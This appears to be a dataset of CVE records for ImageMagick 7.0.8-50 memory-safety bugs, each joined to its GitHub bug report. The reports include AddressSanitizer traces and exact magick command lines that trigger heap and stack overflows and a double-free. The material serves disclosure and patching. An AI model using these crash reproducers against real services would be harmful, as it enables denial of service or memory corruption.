#4 0x7f78cdbe0b20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20)
#5 0x7f78cdc20417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417)
#6 0x7f78d025c6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#7 0x7f78cd6c488e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
Address 0x61d00001d670 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/resize.c:2604:28 in .omp_outlined._debug__.69
```
This is about double-free bug in RelinquishAlignedMemory of MagickCore/memory.c:1037:3
```
==26601==ERROR: AddressSanitizer: attempting double-free on 0x61d00001fe80 in thread T1:
#0 0x4ef768 in __interceptor_free (install/bin/magick+0x4ef768)
#1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3
#2 0xafe7c6 in RelinquishCacheNexusPixels MagickCore/cache.c:1089:12
#3 0xb0d5db in SetPixelCacheNexusPixels MagickCore/cache.c:5080:9
#4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7
#7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#8 0x7fed18cb6452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#9 0x7fed18c701b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
#10 0x7fed18c6eb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20)
#11 0x7fed18cae417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417)
#12 0x7fed1b2ea6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#13 0x7fed1875288e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
0x61d00001fe80 is located 0 bytes inside of 2240-byte region [0x61d00001fe80,0x61d000020740)
freed by thread T2 here:
#0 0x4ef768 in __interceptor_free (install/bin/magick+0x4ef768)
#1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3
#2 0xafe7c6 in RelinquishCacheNexusPixels MagickCore/cache.c:1089:12
#3 0xb0d5db in SetPixelCacheNexusPixels MagickCore/cache.c:5080:9
#4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7
#7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#8 0x7fed18cb6452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#9 0x7fed18c701b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
previously allocated by thread T1 here:
#0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0)
#1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
#3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12
#4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7
#7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#8 0x7fed18cb6452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#9 0x7fed18c701b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
Thread T1 created by T0 here:
#0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0)
#1 0x7fed18cac110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110)
Thread T2 created by T0 here:
#0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0)
#1 0x7fed18cac110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110)
SUMMARY: AddressSanitizer: double-free (install/bin/magick+0x4ef768) in __interceptor_free
==26601==ABORTING
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information: CC=clang-7 CXX=clang++-7
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-use-after-free in MagickCore/resize.c and double-free in RelinquishAlignedMemory of MagickCore/memory.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1589/comments | 11 | 2019-06-11T05:31:32Z | 2019-07-09T13:21:32Z | https://github.com/ImageMagick/ImageMagick/issues/1589 | 454,487,713 | 1,589 |
CVE-2019-13302 | 2019-07-05T01:15:10.373 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/fourier.c in ComplexImages. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/d5089971bd792311aaab5cb73460326d7ef7f32d"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1597"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1597 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -treedepth 71 "(" magick:logo +repage ")" "(" magick:granite -white-threshold 0% -cycle 256 -lat 815 ")" -bordercolor rgb"("101,151,20")" -blue-primary 638,241 -print "0O." -complex multiply tmp `
Second one also can trigger.
cmd:
`magick -seed 0 "(" magick:logo +repage ")" "(" magick:logo +repage ")" -render -size 2872 -complex multiply -quiet tmp
`
Here's ASAN result.
```
==16842==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000a80 at pc 0x7fea5bb0c52f bp 0x7fff5c11c590 sp 0x7fff5c11c588
READ of size 4 at 0x61e000000a80 thread T0
#0 0x7fea5bb0c52e in ComplexImages MagickCore/fourier.c:305:45
#1 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
#2 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14
#3 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#4 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#5 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#6 0x526f95 in MagickMain utilities/magick.c:149:10
#7 0x5268e1 in main utilities/magick.c:180:10
#8 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41b069 in _start (install/bin/magick+0x41b069)
0x61e000000a80 is located 0 bytes to the right of 2560-byte region [0x61e000000080,0x61e000000a80)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7fea5bbb9666 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7fea5b910d5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
#3 0x7fea5b8fe1c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12
#4 0x7fea5b8f5b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0x7fea5b913f36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0x7fea5bb0ae5d in ComplexImages MagickCore/fourier.c:250:8
#7 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
#8 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14
#9 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:45 in ComplexImages
```
Here's the ASAN result for second cmd
```
==16863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2a0831b800 at pc 0x7f2a1747e649 bp 0x7ffd7c094350 sp 0x7ffd7c094348
WRITE of size 4 at 0x7f2a0831b800 thread T0
#0 0x7f2a1747e648 in ComplexImages MagickCore/fourier.c:305:18
#1 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
#2 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14
#3 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#4 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#5 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#6 0x526f95 in MagickMain utilities/magick.c:149:10
#7 0x5268e1 in main utilities/magick.c:180:10
#8 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41b069 in _start (install/bin/magick+0x41b069)
0x7f2a0831b800 is located 0 bytes to the right of 3686400-byte region [0x7f2a07f97800,0x7f2a0831b800)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f2a1752b666 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f2a172746ac in OpenPixelCache MagickCore/cache.c:3728:46
#3 0x7f2a1727a991 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0x7f2a17280c59 in SyncImagePixelCache MagickCore/cache.c:5494:28
#5 0x7f2a174defc1 in SetImageStorageClass MagickCore/image.c:2627:10
#6 0x7f2a1747c4f7 in ComplexImages MagickCore/fourier.c:185:7
#7 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
#8 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14
#9 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:18 in ComplexImages
```
Thanks.
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-17 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1597/comments | 2 | 2019-06-17T03:51:17Z | 2019-07-08T01:50:56Z | https://github.com/ImageMagick/ImageMagick/issues/1597 | 456,730,033 | 1,597 |
CVE-2019-13303 | 2019-07-05T01:15:10.437 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/composite.c in CompositeImage. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/d29148fae06c01ef215940e084cf41853c117bab"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1603"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1603 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow in MagickCore/composite.c:666:45 in CompositeImage.
I compiled ImageMagick with --disable-openmp option.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -sampling-factor 3.307x3.198 "(" magick:granite +repage ")" "(" magick:rose +repage ")" "(" magick:rose +repage ")" -encoding AdobeStandard -extract 285x52^-70-70 -region 75x310-64-51 -evaluate-sequence Min -layers compare-overlay tmp`
and run this cmd:
`magick -seed 0 "(" magick:logo -region 306%-74-69 -lat 886 ")" "(" magick:netscape -level 64 ")" "(" magick:granite -opaque rgb"("12,57,57")" -modulate 94,59,3 -frame 4%-82+23 ")" -comment "B>%C%o" -style Any -layers compare-any tmp`
Here's ASAN result.
```
==5479==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000008900 at pc 0x7f9c528f0e7d bp 0x7ffd8cc41710 sp 0x7ffd8cc41708
READ of size 4 at 0x626000008900 thread T0
#0 0x7f9c528f0e7c in CompositeImage MagickCore/composite.c:666:45
#1 0x7f9c52b23aa0 in CompareImagesLayers MagickCore/layer.c:792:10
#2 0x7f9c522d035c in CLIListOperatorImages MagickWand/operation.c:4199:26
#3 0x7f9c522d934e in CLIOption MagickWand/operation.c:5276:14
#4 0x7f9c5211aa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#5 0x7f9c5211bd0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#6 0x7f9c52165ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#7 0x526f95 in MagickMain utilities/magick.c:149:10
#8 0x5268e1 in main utilities/magick.c:180:10
#9 0x7f9c4cbdcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#10 0x41b069 in _start (install/bin/magick+0x41b069)
0x626000008900 is located 0 bytes to the right of 10240-byte region [0x626000006100,0x626000008900)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f9c52b54f66 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f9c528abd5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
#3 0x7f9c528991c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12
#4 0x7f9c52890b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0x7f9c528aef36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0x7f9c528f0bae in CompositeImage MagickCore/composite.c:637:11
#7 0x7f9c52b23aa0 in CompareImagesLayers MagickCore/layer.c:792:10
#8 0x7f9c522d035c in CLIListOperatorImages MagickWand/operation.c:4199:26
#9 0x7f9c522d934e in CLIOption MagickWand/operation.c:5276:14
#10 0x7f9c5211aa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f9c5211bd0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f9c52165ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f9c4cbdcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/composite.c:666:45 in CompositeImage
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-18 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in MagickCore/composite.c:666:45 in CompositeImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1603/comments | 2 | 2019-06-18T17:08:25Z | 2019-07-08T01:51:18Z | https://github.com/ImageMagick/ImageMagick/issues/1603 | 457,598,033 | 1,603 |
CVE-2019-13304 | 2019-07-05T01:15:10.500 | ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/7689875ef64f34141e7292f6945efdf0530b4a5e"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1614"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/bfa3b9610c83227894c92b0d312ad327fceb6241"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4715"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1614 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a stack buffer overflow at coders/pnm.c:1762 in WritePNMImage.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 -render "(" magick:rose -sample 846x913^+16+22 -white-threshold 112 ")" -compress None -adjoin tmp`
Here's ASAN log.
```
=================================================================
==9828==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcc293daa0 at pc 0x7f71ad7e3477 bp 0x7ffcc293a0f0 sp 0x7ffcc293a0e8
WRITE of size 1 at 0x7ffcc293daa0 thread T0
#0 0x7f71ad7e3476 in WritePNMImage coders/pnm.c:1762:21
#1 0x7f71ad07c065 in WriteImage MagickCore/constitute.c:1159:16
#2 0x7f71ad07cf8c in WriteImages MagickCore/constitute.c:1376:13
#3 0x7f71aca4050d in CLINoImageOperator MagickWand/operation.c:4796:14
#4 0x7f71aca441cc in CLIOption MagickWand/operation.c:5258:7
